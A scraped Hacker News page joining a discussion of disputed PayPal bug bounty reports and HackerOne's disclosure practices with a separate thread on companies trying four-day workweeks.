Sorry, on further thought while I still disagree with the analysis above as being overly dismissive, I think the OP may share some blame for not writing higher quality reports with POCs. Also, the OP doesn't explain whether or not they saw the original reports for those marked Duplicate. That's a very critical point. See here -

https://docs.hackerone.com/programs/duplicate-reports.html

For anyone actually interested here and not just drive by commenting (like me, ahem), it's worthwhile looking into the platform in more detail. See my post below -

https://news.ycombinator.com/item?id=22406372

mtnGoat(10000) about 23 hours ago [-]

out of curiosity, do you work at PayPal or is the first paragraph all assumptions?

One would have thought Wells Fargo had a talented team of people to catch their millions of fake accounts they made, but alas it went on for a decade. I will always assume companies have their backs turned to security, until proven otherwise, regardless of size or perceived risk.

HiJon89(4256) about 23 hours ago [-]

For #5 I believe it's not just a self-XSS, but also executes on the support agents browser, allowing you to potentially exfiltrate their cookies:

> Anyone can write malicious code into the chatbox and PayPal's system would execute it. Using the right payload, a scammer can capture customer support agent session cookies and access their account.

whydoyoucare(10000) about 22 hours ago [-]

I agree -- the tone of the article was cloak-and-daggers, which makes me think things are not what they seem they are. Unless we fully understand the exact set of issues, it is difficult to decide either way.

Sadly, this also undermines trust in the overall state of 'security research', which most of the time, borders on being silly. :-/

brianpgordon(4163) about 17 hours ago [-]

> It should, I hope, go without saying that nobody is required to run a bounty in the first place, and most companies probably shouldn't.

Really? Most companies? That seems like an extraordinary claim.

I'm not a security researcher but if I stumbled on some security issue in something that's not open-source and not owned by my employer, the only way I'd consider reporting it is if they have a bug bounty / responsible disclosure program. Otherwise I'd expect it would be about as likely for me to receive a 'thank you' as a knock on the door from law enforcement.

blazespin(3912) about 22 hours ago [-]

What proof do you have that #6 is not persistent XSS? If it is, that's a potentially brutal vuln (as persistent XSS often is), even if you need the users password to exploit it.

And persistent XSS is definitely not out of scope according to PayPal's guidelines. https://hackerone.com/paypal

Why are you saying #6 --- are duplicates of other people's issues. ? It must have been marked as dupe of N/A. They would haved gained rep if it was a dupe of someone elses report. They lost rep, so it was most likely marked as dupe of an N/A.

As I mention below, the big problem is the OP didn't include POCs. It's easy to claim 'oh this is can be exploited so easily' but without a POC, it's not always clear and perhaps he missed some detail that made his assumptions incorrect.

Anyways, I do have to say hackerone looks pretty cool. This is the first I've seen it and they seem like they are working very hard (we all should be working hard) to make this work for everyone. They are likely just victim's of their success.

rasengan(1383) about 24 hours ago [-]

> 1. They can suppress a new-computer login challenge (they call this '2FA', but this is a risk-based login or anti-ATO feature, not 2FA).

2FA means 2 Factor Authentication. This works by forcing one to use two different forms of identification to authenticate, such as login/password and, in this case, identification of the computer used.

So, with all respect sir, what I'm saying is while this isn't the best 2FA, it absolutely IS 2FA by definition.

nebulous1(10000) about 22 hours ago [-]

> I'm inclined not to believe their claim that Paypal acted abusively here (and I am not a fan of Paypal).

I agree that they have some issues with the way they've reported it, and I agree with your numbered points except that they imply that #5 may make the support agent vulnerable, but I'm not sure you can say PayPal haven't acted abusively. Many of the reports are legitimate vulnerabilities even if they aren't critical ones. The first is clearly a security issue yet PayPal have said that it isn't. In return they have received nothing but a reputation hit, and this is clearly unfair.

Do PayPal specifically say that anything involving stolen details are out of scope? This seems a bit weak considering they have numerous systems in place to combat misuse of stolen accounts. And even if they do it doesn't explain #2.

edit: To answer my own question, the page at lists 'Vulnerabilities involving stolen credentials or physical access to a device' as out of scope for web applications. They likely intend that to apply to mobile applications also, but they've structured the page in a way that makes that ambiguous.

leejo(3861) 1 day ago [-]

This doesn't surprise me. I'm currently trying to get a refund out of PayPal after what looks like a massive flaw in their refund process. I paid for something on eBay and it appears to have been a compromised account. The original auction, feedback history, etc, looked legit. The flow was this:

1) I pay for a product on eBay using PayPal, using my creditcard (direct from card, not from any existing PayPal balance).

2) Seller marks item as shipped but then 5mins later issues an e-check refund (rather than a refund on my creditcard).

3) Seller cancels and deletes the original item on eBay so i can no longer raise a dispute there.

4) The e-check refund continues to bounce as clearly the compromised paypal account can't pull those funds from the other source.

5) The refund being in limbo means my dispute with PayPal gets closed as 'a refund was previously issue' (which did, and will continue to, bounce).

The important part is 2 - since I paid for this on my card the refund should have gone direct to my card. However, since I paid for this on my creditcard I've raised a chargeback with the issuing bank, which should hopefully make PayPal sit up and put a bit more effort into sorting this out.

lonelappde(10000) 1 day ago [-]

You put in way too much effort. Call your credit card company first. Your credit card company profits from vendor (PayPal) mistakes by charging fees, so they are always happy to help you.

fencepost(4320) 1 day ago [-]

I've raised a chargeback with the issuing bank, which should hopefully make PayPal sit up and put a bit more effort into sorting this out.

Or just close your account and ban you.

thedanbob(10000) 1 day ago [-]

I've been bitten before by the fact that if you don't use PayPal, eBay's interest in helping you with a refund dispute is exactly zero. And now I learn this. I guess PayPal + credit card is the way to go if you want any chance of a successful refund.

hoppla(10000) 1 day ago [-]

My two last reports were closed as duplicate. I got some rep for one, and zero rep for the other. Both were real vulnerabilities. It is strange the reputation reward is not consistent.

lgeorget(4280) about 23 hours ago [-]

According to HackerOne help page on reputation, it depends on the status of the vulnerability: yet undisclosed, not applicable, publicly known...

dev_hacker(10000) 1 day ago [-]

Moral of story is obvious: Next time sell the exploits on the dark web and skip the blog post.

m-p-3(10000) 1 day ago [-]

It's all that PayPal deserves of they get a pass for PCI-DSS non-compliance.

tfandango(10000) 1 day ago [-]

I have not used Paypal since I had to file a dispute over an item I bought on ebay via Paypal. As a response they snail-mailed me a bunch of screenshots of an internal web-app with a bunch of info for someone else, SSN, CC number, address, etc. Everything I would need to do something bad. I called them and they did not seem to care so I called the guy (I had his number of course) but he never answered or responded to my email.

A few months later I got a voicemail from paypal, apparently my original call bubbled up. They asked if I had destroyed the info and to let them know if I had not (I did). Then there was a long pause (I guess they assumed the voicemail was over), and it turned out there were 4-5 people on that call and they then discussed how the call went and whether or not it was sufficient to CYA.

I've not used it since, and I hoped they got their act together (sounds like maybe not).

Cynddl(3873) 1 day ago [-]

What does CYA mean? Haven't seen this acronym before.

jedberg(2119) about 22 hours ago [-]

> Then there was a long pause (I guess they assumed the voicemail was over), and it turned out there were 4-5 people on that call and they then discussed how the call went and whether or not it was sufficient to CYA.

That's hilarious. Please tell me you kept that recording.

fxleach(10000) 1 day ago [-]

My experience with PayPal, from dev support to account managers, has been an absolute shit show. They were simply the first to their market and it's hard to kick them out.

strictnein(10000) 1 day ago [-]

I've had plenty of problems with bug bounty platforms and have completely stopped doing them. But most/all of these 'critical' reports aren't critical and some of the behavior of their 'researchers' is unprofessional at best. There's maybe one legit report here, and that's #2.

#1 'In order to bypass PayPal's 2FA, our researcher used the PayPal mobile app and a MITM proxy, like Charles proxy.'

So you need to be MITM'd and have a malicious cert installed? Yeah... not 'critical' and out-of-scope for most places.

For '#2 Phone verification without OTP', look at the messages they were sending. Did they not understand H1's responses? Repeatedly demanding answers isn't a great look. It's not surprising it was locked.

For #3: it requires stolen creds. A 'security' flaw that requires stolen creds and brute forcing isn't going to get much traction anywhere.

#4 was a dupe

#5 is a self XSS, no one accepts these

#6 is a stored self XSS and a dupe

Dylan16807(10000) 1 day ago [-]

> So you need to be MITM'd and have a malicious cert installed?

No. The attacker is the man in the middle to himself, because why are you trusting the client.

> A 'security' flaw that requires stolen creds and brute forcing isn't going to get much traction anywhere.

The feature is meant to stop people from using stolen creds.

It does not work.

Given that stolen creds exist, that sounds like a security flaw to me.

celerrimus(10000) about 24 hours ago [-]

Although I rejected many similar MITM reports myself, in this case I think this is valid threat. It's not some random comments or forum site where there's almost no value for attackers, we're talking on pseudo-banking system, where users have usually at even few credit cards hooked and/or some account balance, and indeed there are many places you can buy leaked/stolen stolen credentials. Ability to bypass automatic 2FA by hackers is little alarming for service where users may lost $1000+. This simply should be fixed and some bounty should be paid for it (of course probably not maximum bounty, but still).

#5 and #6 are indeed exaggerated, especially that even if hacker has stolen credentials, and bypassed automatic 2FA, security question won't be displayed on same page users use to confirm payment (to replace e-mail address), or keylog credit card information.

ramimac(10000) 1 day ago [-]

I agree that none of these reports could be considered 'critical.' I also agree that the tone is a bit unprofessional. I'd add that I generally find these publicity pushes using fairly bland findings to be distasteful. All that being said, I'd like to clarify a bit based on my read of #1.

> #1 'In order to bypass PayPal's 2FA, our researcher used the PayPal mobile app and a MITM proxy, like Charles proxy.'

> So you need to be MITM'd and have a malicious cert installed? Yeah... not 'critical' and out-of-scope for most places.

In generally, using a proxy to perform a 2FA bypass wouldn't decrease the risk. In this case, the attacker already has compromised credentials, and they are trying to bypass the secondary control. As they are the one authenticating, the need for MiTM isn't a huge deal.

That being said, another point that was made is that the '2FA' they are bypassing isn't actually Paypal's 2FA. Instead, it is a secondary, risk-based validation. A bit of a semantic difference, but important to note that if a user was leveraging 2FA this bypass wouldn't actually get an attack who had compromised credentials access.

WUHANCLAN(10000) about 24 hours ago [-]

HackerOne is complete garbage. I spent close to a month digging into Uber and compromised their m.uber.com mobile endpoint; they hemmed and hawed and then awarded the $25K to another HackerOne top performer stating that he had discovered the exact same vulnerability the day before I had submitted the report.

What's weird about it is that I was using Burp Proxy for everything, and this guy was directly connected to PortSwigger (and Uber was running some promotional for a free three month license for Burp Proxy).

HackerOne completely sided with Uber on everything, gave the Portswigger kid $25K and that was that.

So, in summary: HackerOne is trash, and Burp Proxy may contain backdoor functionality which is relayed directly back to Portswigger whenever a high value critical vulnerability is discovered with it.

albinowax_(4151) about 21 hours ago [-]

Hi, I work at PortSwigger.

> Uber was running some promotional for a free three month license for Burp Proxy

This is flat out wrong - the promotional partnership was done with HackerOne.

> What's weird about it is that I was using Burp Proxy for everything...

Burp Suite is used by tens of thousands of security experts and if we posted vulnerability data back we would get caught in about ten seconds. Also it would be stupid and illegal etc

Could you share the username of this 'Portswigger kid'? As far as I know I'm the only person here that does bug bounty hunting, and I've never received a 25k payout off Uber. So I'm wondering if this person is actually affiliated with PortSwigger at all.

thaumasiotes(3762) about 22 hours ago [-]

What would you expect HackerOne to do in the situation you describe? You filed a duplicate report. All of the malfeasance you allege is coming from Portswigger.

guidovranken(3782) 1 day ago [-]

HackerOne appears to be completely broken and I wouldn't recommend it to anyone.

Disagreements are to be expected on a bug bounty platform, but these days they just stop responding altogether and don't pay. It borders on outright fraud.

I've been trying to report a Squid RCE (CVE-2020-8450) since October. The Squid maintainers seemed unprepared for dealing with the report as they kept being unresponsive and it took 2 months to merge my patch. Maybe they're volunteers, so I can't blame them. Reported it to the bug bounty [1] which promises high rewards on January 20th and apart from triaging it, there has been radio silence since despite having invoked HackerOne mediation. I have more Squid memory bugs and I'd rather rm -rf them than go through this process again.

HackerOne used to be decent but this appears to be a structural problem now [2].

[1] https://hackerone.com/ibb-squid-cache [2] https://twitter.com/DevinStokes/status/1228014268567547905

DyslexicAtheist(90) 1 day ago [-]

I've never liked these rent-seeking bugbounty platforms which are inserting themselves as middle-men and mediators, but then take away the real value that comes from building direct client relationships.

it's ok for people who start out and only want to work on vulns and not bother with 'sales' (building long term client relationships). severely limiting though in the long run!

much better to spend time on pitching your service directly and build a name for yourself this way. most customers I had always came back and rewarded me with more work. on those bounty platorms however you're constantly competing with drive-by pen-testers who lower your price and you have no say in the whole negotiation and bargaining phase. your previous reputation also tends to stay locked into these platforms.

a better long term approach is to build connections, set up a ltd (LLC) and make sure you have a good lawyer who can advise you (not just when things go down). ideally build a collective with other like minded (e.g. like a consulting or law practice where you don't always have to share clients but you can if you want to complement each others skills).

this is imo the best way to escape the 'scope-prison' and the best way to learn about clients additional (and actual) weak points (points that they haven't themselves even thought about).

does anyone here do it this way or with a similar approach?

csnover(4304) 1 day ago [-]

HackerOne's community team also seems trained to gaslight ethical reporters who try to follow responsible disclosure practices.

I submitted a vulnerability to a vendor on H1 along with a typical "I plan on publicly disclosing this vulnerability on X date" note, and started getting emails directly from H1 telling me that this undermined vendors' confidence in the platform and that doing what I was doing might make it so I can't use HackerOne any more. In the same correspondence they said that my approach made sense—but they continued to threaten that "it would be a shame if you weren't able to participate any more".

In my case, the vendor verified the vulnerability quickly, but kept dodging my follow-ups by replying without answering my questions. When the vendor refused to assign a CVE after I asked four times, I contacted the HackerOne CNA directly to get an assignment. They replied within 48 hours asking if there was any public information already, I said no and that I was planning on disclosing on X date, and then they just stopped replying for a month until after the deadline passed.

At a glance, H1's disclosure guideline appears fairly reasonable: 30 days by default, an upper bound of 180 days. In actuality, those times only start once a vendor closes a ticket, and can be extended indefinitely. Reporters aren't allowed to speak publicly about anything they send to the platform until the ticket is closed and the vendor agrees to allow it, even in the public programs.

As far as I can tell, HackerOne's primary purpose now is to act as a shield for bad vendors to hide their security defects from the public by using network effects to bully reporters into keeping quiet. The community team claim this isn't what they're doing and that they always ask "why should this be private?", but their marketing material to vendors tells a different story[0], their actions with me tell a different story, and the vendor I reported to had over 100 closed reports, going back years, and none of them were publicly disclosed.

Unless you must pay your bills with security bounties, or don't actually care and just want to dump a report and forget about it, I unequivocally recommend against using HackerOne to report a vulnerability.

[0] https://www.hackerone.com/sites/default/files/2018-11/The%20... page 12: "even with a public program, bug reports can remain private and redacted, disclosure timeframes are up to you"

RyJones(4254) about 22 hours ago [-]

My experience with Hacker One is almost entirely negative and I don't understand why it has such mindshare.

WUHANCLAN(10000) about 15 hours ago [-]

HackerOne is complete fraud. They've got a super duper simple carrot before the horse business model which has thousands of kids beating up web apps for free. A valuable service for their Fortune 100 clientele; for the people actually doing the work for them, not so much.

mehlmao(10000) 1 day ago [-]

I worked as a contractor for a company that's a household name in the US. I am now convinced that HackerOne only exists for CISOs to say 'look, I'm doing something' during the 2-3 years they stay at a company.

The cybersecurity team had a backlog of roughly 30 critical issues discovered internally before starting HackerOne. We were unable to fix those issues, or the ones reported to us, because we had no visibility into source code, there were 12 different development teams, most of them outsourced, and all the project managers were interested in was covering their ass.

The HackerOne deployment was invite-only, but the few hackers in it did fantastic work. I kept being told to find excuses to reduce the amount we'd pay for the critical issues they'd find and we'd fail to fix. At least we triaged faster than Paypal.

tptacek(84) about 24 hours ago [-]

What does 'broken' mean here? If the development team is unresponsive, what do you expect H1's response to be?

cj(2950) 1 day ago [-]

> HackerOne appears to be completely broken and I wouldn't recommend it to anyone.

Completely disagree with this.

I launched a HackerOne program for my company last month (for free, not using their "managed" service).

Of the many reports people submitted, we triaged 30-40 valid reports (most very minor, one or two moderate). We paid out a few thousand dollars in rewards.

At the same time, we also did a more traditional 2-week penetration test with Cobalt (https://cobalt.io/) that cost over $10,000, and HackerOne was the clear winner when it came to the number of high quality security reports worth fixing. And H1 was 2-3x cheaper after paying out the bounties.

I'm sure HackerOne isn't great for all companies, but just posting this to refute the blanket statement that HackerOne is "completely broken" across the board.

luch(4156) 1 day ago [-]

Squid is vastly under-equipped to deal with the security hygiene needed for a project this important.

That's the tragedy of the open source world : mission critical for everyone, but no actor willing to maintain it properly. It's Heartbleed all over again.

LegitShady(10000) 1 day ago [-]

>When we pushed the HackerOne staff for clarification on these issues, they removed points from our Reputation scores, relegating our profiles to a suspicious, spammy level. This happened even when the issue was eventually patched, although we received no bounty, credit, or even a thanks. Instead, we got our Reputation scores (which start out at 100) negatively impacted, leaving us worse off than if we'd reported nothing at all.

That seems like a good way to make sure nobody trusts your business. What say you, hackerone? How can anyone trust this business acting against what ostensibly is its core functions.

thaumasiotes(3762) 1 day ago [-]

They had out-of-scope issues closed as being out-of-scope, which automatically lowers their reputation on the platform. The researchers are outraged:

> When we submitted this to HackerOne, they responded that this is an "out-of-scope" issue since it requires stolen PayPal accounts. As such, they closed the issue as Not Applicable, costing us 5 reputation points in the process.

But Paypal's policy really couldn't be clearer:

> Out-of-Scope Vulnerabilities

> Vulnerabilities involving stolen credentials or physical access to a device

( https://hackerone.com/paypal )

If Paypal says 'don't send us this type of report', and you send one anyway, are you really surprised when your account gets a warning attached saying 'this person usually files low-value reports'?

harikb(3684) 1 day ago [-]

There is plenty of blame to go around beyond the management. Management is always going to deflect, deny, or do whatever to save their face. There must be "architect/lead engineer" level folks whose primary task is to engineer these stuff well. WTF are they doing?

There should be a wall of shame for these (not by person, but by company and group). Next time you get a contact/candidate who "lead the sign-on 2fa management" at PayPal, we will know to be extremely cautious.

There is no "karma" in tech world. People design the shittiest systems in company 1 and then move on to some other role in company 2 and float around taking credit for more and more stuff someone else did.

dinkydrew(10000) 1 day ago [-]

As someone in management, I will somewhat agree that management too often deflects from their ownership and responsibility, but what you are saying is also a form of deflection, unless you also espouse a kind of paternalistic oversight over architects/engineers that would absolve them of responsibility by simply being mindless executors of management's commands and lead. I suspect that is not something most here would support.

There needs to be a balance, each party needs to play their own role and work in unison. As much as managers need to manage things and largely clear the way for architects and engineers, architects and engineers need to perform their job and role, to which I would argue belongs adhering to industry standards for security as a core aspect.

If there was clear pressure or even overriding of architects/engineers insisting on adhering to standards by managers who were not performing their role of advocating on behalf of or negotiating with architects/engineers, and instead were even sabotaging them and their product, then sure, it's a management failure; but at that point, architects/and engineers should have also even out right refused and revolted against managers or at the very least clearly and expressly voiced their vehement opposition.

As a manager, I would have even stuck my neck out and sided with an architect and engineer rebellion if they were pressured or even asked to sacrifice core requirements. I also understand though that not all organizations have managers that would do that, especially in careerist organizations where managers see people as bodies to pile up to climb the ladder faster.

hprotagonist(2013) 1 day ago [-]

paypalsucks has been a registered domain since 2002 for a good reason.

aneutron(4316) 1 day ago [-]

That is a hilarious random fact. Thanks for the info.





Historical Discussions: More bosses give four-day workweek a try (February 21, 2020: 921 points)

(927) More bosses give four-day workweek a try

927 points 4 days ago by hhs in 100th position

www.npr.org | | comments | anchor

By choosing "I agree" below, you agree that NPR's sites use cookies, similar tracking and storage technologies, and information about the device you use to access our sites to enhance your viewing, listening and user experience, personalize content, personalize messages from NPR's sponsors, provide social media features, and analyze NPR's traffic. This information is shared with social media services, sponsorship, analytics and other third-party service providers. See details.




All Comments: [-] | anchor

theatraine(3663) 4 days ago [-]

I never understand these studies. I'm bootstrapping a startup and my work output scales linearly with hours until about 60 hours per week. 60 hours per week is comfortable with 4x12 hour days and then 12 hours over two shorter days. To accomplish errands and the like I just do things before 2pm which is plenty of time.

For me personally more time working = more output. What am I missing?

I should note that I have no family, no commute, and my gym is in my home so I'm able to save some hours on those things. I could see how in those cases one would have less time for work.

quietthrow(2919) 3 days ago [-]

You are part of the hyperactive onsite mainstream HN crowd.single or married but no other responsibilities (children, aging parents and other such commitments). When you live the other life you will see how work just fills up and an extra day feels like a miracle.

kharak(10000) 3 days ago [-]

I wonder what you do. There are plenty of things I could do for 12 hours, coding isn't one of them. Honestly, I'd say that I average about 6 hours a day of coding ability. That's an up to 4 hours before, because I changed a great deal of unhealthy habits.

incompatible(3627) 3 days ago [-]

I'm wondering how many people would take advantage of the 4-day work week to fit in another job in one or more of the off-days. How many people are obsessed with obtaining higher income, far beyond what they need to survive?

combatentropy(4295) 4 days ago [-]

I'm still waiting for someone to do a study of a three-day (24-hour) work week.

tren(4260) 4 days ago [-]

I've been doing this for 3 years now and it works great for me. 3/4 of our company are 4 days or less a week and in the last 5 years we've turned a loss making company into something quite profitable. We generally have one short meeting a week, outside of that we do 1 on 1s when necessary. The rest of the time we can sit down and focus 100%.

BlameKaneda(4308) 4 days ago [-]

Wonder how hourly employees who work 4-days weeks at 32 hours would feel about this proposal.

strig(10000) 4 days ago [-]

They could do 4x 10 hour days instead

izzydata(10000) 4 days ago [-]

If they increase the hourly pay by 20% then probably quite happy.

Edit: 25%.

bboygravity(10000) 3 days ago [-]

These recurring 4-day work week discussions on HN show how non-European this site is.

4-day work weeks have been completely normal for lots of people in Europe for decades. In the Netherlands it's almost the norm to chose whether you want to work 4 or 5 days. 4 day work weeks are not always accepted everywhere, but usually they are in most places.

In France the standard work week has been 35 hours for the past 2 decades, which may or may not equate to a 4 day work week depending on how you organize your work days.

The Netherlands and France are still alive and kicking. They have plenty of successful businesses.

Conclusion: no, 4 day work weeks will not destroy your country, economy, business or lifestyle. The one and only reason to have 5 day or longer work weeks is: greed. IMHO.

Having said that IMO a more important factor in time savings would be remote working or not. Assuming a commute of an hour a day to and from work (2 hours total per day, reality for lots of people) you waste 10 hours per week of your life commuting. Unpaid.

5 days a week without commute = -10 unpaid hours spent on work related things (vs with commute)

4 days a week with commute = -2 unpaid hours spent on work related things.

hylaride(10000) 3 days ago [-]

The famous French 35 hour workweek only applies to certain categories of workers though. And even then it's only where overtime kicks in. Every French white collar worker I've known (probably about a dozen or so) was on salary and had similar working hours to me (in Canada).

Also, French productivity can be overstated in statistics. They have relatively high unemployment amongst youth and the low-skilled. This essentially removes the least productive from the stats, making it look higher.

Not to say that a 4 day week would be bad, but careful what you base it on.

SnowProblem(4266) 3 days ago [-]

> The Netherlands and France are still alive and kicking. They have plenty of successful businesses.

Are they? I can't think of a single technology company coming out of either.

jt2190(4236) 4 days ago [-]

Counter-point, from the article:

> Natalie Nagele, co-founder and CEO of Wildbit, has heard from other leaders who say it didn't work for them. She says it fails when employees aren't motivated and where managers don't trust employees.

Also it would be good to keep in mind the Hawthorne Effect: https://en.wikipedia.org/wiki/Hawthorne_effect#History

chadlavi(4310) 4 days ago [-]

> it fails when employees aren't motivated and where managers don't trust employees

I'd counter that _anything_ (including the standard 5x8 schedule) will fail in those conditions.

jacquesm(45) 4 days ago [-]

It's interesting to note that in Europe that 32 hour workweek is fairly standard and nobody would even bat an eye or think this is special in any way.

https://smallbiztrends.com/2018/11/working-hours.html

TrackerFF(10000) 4 days ago [-]

Here in Norway it is 37.5 hours of paid work / week.

Our finance minister recently had a hissy fit over the idea of shortening the work week, arguing that if we got rid of 3.5 hours a week (i.e down to 34 hr. weeks) we'd lose out on tens of billions in tax revenue.

fogetti(4048) 4 days ago [-]

Is it though? I worked in 4 different jobs across 2 different countries and this was unheard of. Not even a single one of my friends do this.

nagyf(10000) 4 days ago [-]

Source for this? I'm from Europe and I have friends working in 2-3 different countries in Europe, but 32 hour workweek is not standard anywhere. Never even heard of such a thing being standard in Europe.

lwb(10000) 4 days ago [-]

Something felt fishy about their claim that number of hours worked has been climbing in the United States so I checked their source. It turns out that 'average annual hours worked' has changed from 1,780 in 2011 to 1,786 last year. This seems like barely a rounding error...

On the other hand, if you look at the FRED website it shows that average annual hours worked has massively decreased in the last 50 years: https://fred.stlouisfed.org/series/AVHWPEUSA065NRUG

1951, for example, shows 2,030 hours worked on average. That's the equivalent of more than six additional weeks of full time work.

I would say that Keynes's prediction that economic growth could get to the point where we would only need to work 15 hours a week (750 hours per year, assuming 2 weeks vacation) is ... trending towards becoming true? At current trends, it will take another ~280 years.

(Obviously this is a silly prediction but, an interesting thought experiment.)

walshemj(4216) 4 days ago [-]

Are you forgetting overtime back in 51 I suspect there may well have been more OT worked and there would have been more factories back then

chadlavi(4310) 4 days ago [-]

these numbers are across all industries, right? a 40 hour union job has certain parameters such that the work hours aren't going to shift much without larger political shifts within those orgs.

But I suspect the number of hours a non-union knowledge worker works per year has gone up in the same time frame.

decebalus1(10000) 4 days ago [-]

> Something felt fishy about their claim that number of hours worked has been climbing in the United States so I checked their source. It turns out that 'average annual hours worked' has changed from 1,780 in 2011 to 1,786 last year. This seems like barely a rounding error...

This is a classic case of statistics being used to prove a different point. Perhaps the average annual hours worked is pretty much the same, but the way work happens has changed and it may be harder to quantify. For example, what if there are more part time jobs and people have 2-3 part time jobs? Or how are the hours worked by the flexible hours folks at Starbucks (flexible to be picked by someone else I mean, usually only at peak times). Anecdotally, there's a guy I know who holds a full time job selling insurance, then works afternoons for UPS for the health benefits. How is that reported in 'average annual hours worked' thing?

It's the same as saying that unemployment went down and being happy about it. Because there are so many jobs, some people have 3 in order to pay rent.

tempestn(1530) 4 days ago [-]

Does this include part-time workers? If so, the slight increase since 2011 could just be a reflection of the lower unemployment and underemployment.

Actually even if it's only considering full-time employees, it could still be related to unemployment, since a tighter labor market would leave more positions unfilled, which would mean more overtime.

dcre(3185) 4 days ago [-]

The overall average per person has declined (though not really since the 80s). However, in the same time frame, the proportion of women in formal work went from 35% to 60% [1]. So the story for men and women looks very different. Note also that for women this is a shift from domestic labor to formal labor, so it's probably not much of an increase in hours worked even though it looks like that on paper. However, in the same time frame, I believe men spend a bit more time on housework than they used to, which is not included in formal hours worked.

The point of all this is simply that it is difficult to make conclusions about labor market trends from average annual hours worked.

[1] https://fred.stlouisfed.org/series/LNS11300002

notJim(10000) 4 days ago [-]

I was curious for context on this, and honestly didn't find much in my brief search, but apparently it's thought that for professionals, the hours worked has gone up, while for the working class, it has gone down. I didn't research it, but I wonder if part of the explanation is that working class people tend to be under-employed, and/or government policies that kick in at say, 30 hours / week (like the ACA, for example) push the numbers down. Professionals of course tend to be salaried, so you really want to squeeze out as much as you can.

zulgan(3652) 3 days ago [-]

I don't think it is possible to compare hours worked 100 years ago and now.

Now, especially for developers and office workers, work is almost indistinguishable from life.

For example there is barely any time while I am awake that I am not thinking about work. (sometimes even my dreams are about work related tech topics)

Not to mention that modern management techniques are deeply psychological, and sophisticated propaganda.

TBH I dont think more work is being done, I just think the corporation organism consumes as much as it can.

askafriend(3131) 4 days ago [-]

I'd really like to do 4x10hrs versus 5x8hrs. I think that'd be a significant improvement for a lot of people.

wolco(3776) 4 days ago [-]

If you are trying to kill 40 hours that works. Why not 14-14-12 or 20-20 where you take 4 hours from each day to get the 8 hours for sleep.

I remember going to an interview somewhere and during the summers they came in at 8:30am each day (instead of 9) so they could get off at 2:30pm on a Friday. That sounded like hell for no big gain.

We need to go down to 20 hours.

gordon_freeman(2608) 4 days ago [-]

I think stuffing 10 hours in a workday will have a diminishing rate of productivity return during the last couple of hours during the workday.

qsymmachus(3933) 4 days ago [-]

Why not 4x8 hours

Ididntdothis(4271) 4 days ago [-]

This is terrible if you have a long commute. During the 4 days you only commute, work and sleep. Now as a remote worker I could do this.

risyachka(10000) 3 days ago [-]

I bet you'd like 4x8 even more.

technofiend(10000) 4 days ago [-]

The great thing about 4x10s is if employees are given the choice of Monday or Friday off you suddenly have a 40% reduction in time for meetings where everyone must attend. It cuts down on wasted time and frankly your fourth day is usually more lightly loaded, letting you get more actual work done.

ropiwqefjnpoa(10000) 4 days ago [-]

I did this (4x10) for about a year at a previous company, really enjoyed it.

The hardest part was coming back after the 3 day weekend, it always felt like coming back from vacation.

tasogare(10000) 4 days ago [-]

If were an a 4 day week I would like to have Wednesday free instead of Friday.

gdubs(1582) 4 days ago [-]

When the 40 hour workweek was first proposed, doomsayers said it would be the end of the American economy. The opposite happened, and as injuries and illness decreased, productivity increased. [1]

Something to keep in mind, as it's counterintuitive and the instinct is to say, "that can never happen here", or, "it'll never work."

1: Robert Gordon, "The Rise and Fall is American Growth"

mortenjorck(1140) 4 days ago [-]

I'm genuinely impressed that the Overton window on hours seems to have changed since the last time the 4-day work week was in the headlines.

Not that long ago, it was unquestioned that four days meant 4x10. It was simply unthinkable that we would consider less than forty hours 'full time.' I even skipped this article initially, expecting it to have the same assumptions! And yet, they specifically report that Shake Shack cut back to 32 hours without cutting pay.

I would have expected service-sector jobs to be the last to see something like this. And if a burger chain can do it, an office where we spend 40 hours in a combination of productivity and reading HN can absolutely do it.

Ididntdothis(4271) 4 days ago [-]

It seems a lot of these experiments are a success. But after a while somebody gets greedy and thinks "we get good productivity at 32 hours. I wonder how much more we could get at 40 hours?" And soon you are back at the old schedule.

Something similar happened at my company. For once a project was ahead of schedule. So instead of thinking that the system worked well and keep working in relaxed manner management decided to "pull in" the deadline and suddenly the project was a death march again.

For some people it's hard to accept that relaxed people are productive. They want to see stress and overtime or they will think that people are underperforming.

toper-centage(10000) 4 days ago [-]

Is it not also the responsibility of employees to ask for that benefit? Specially developers have that leverage. We have the ability of changing the whole job landscape.

ChrisMarshallNY(4319) 4 days ago [-]

I was a development manager for years, for a Japanese company.

The Japanese are type A++ (at least, in Tokyo). They are masters at applying stress across the Pacific.

As a manager, it was my job to insulate my team from the stress, and I often took the hit for telling my bosses that I wasn't going to push my people harder than they already were working.

It seemed to work out in the end. When they finally rolled up my team, I had been managing it for 25 years, and the person with the least seniority in my team had a decade with the company.

It's a whole different world, out there, now. I had a manager at a startup tell me that conventional management assumes that engineers will only stay at a company for 18 months, so they really pile on the stress.

I can't even imagine that. There were a lot of downsides to working with the corporation that I worked for, but they treated us all with a great deal of respect, and made it possible for me to keep valuable, senior-level C++ developers for decades; despite rather sub-optimal pay, and a not-so-thrilling work environment.

kody(4281) 4 days ago [-]

I agree that it's hard for some people (managers) to see a relaxed, happy person and believe that they're also totally productive.

I don't blame them either; I feel like the image of overly-caffeinated, stressed-out people is embedded in our collective consciousness as representative of High Productivity and our lizard brains can't seem to be able to reconcile that with the data that is saying 'relaxed people who make enough money, are treated well, and have the freedom to live satisfactory lives outside the office will most probably be more productive, focused, and effective at work.'

NaOH(433) 4 days ago [-]

> For some people it's hard to accept that relaxed people are productive.

Just look at how U.S. culture treats service workers. We best be seated on time for our dinner reservation. No one should wait 15 minutes for their hotel check-in because housekeeping isn't done yet. Oh, and that coffee was ordered nearly 5 minutes ago. And the plumber was supposed to be here at 8.

Your concerns about greed extend well beyond worker productivity. It appears to be the logical extension of believing the individual is sacrosanct.

m3kw9(10000) 4 days ago [-]

It didn't happen when we had weekends. But they workaholics or pressure will have them work weekends. The 4 day week seem moot point in that regard. The other issue come up later on when people get used to 4 day work week is that they eventually have chores that can't be done in 3 day weekends. Sort of like the rule where if you give x amount of time fir a task, you will likely use all of it.

AWildC182(10000) 4 days ago [-]

It's as if killing the golden goose is a tale as old as time...

burnte(4294) 4 days ago [-]

>we get good productivity at 32 hours. I wonder how much more we could get at 40 hours?

Usually 4 days a week means 4 ten hour days, not 4 eight hour days. Hence the phrase 'four tens'.

bumby(10000) 4 days ago [-]

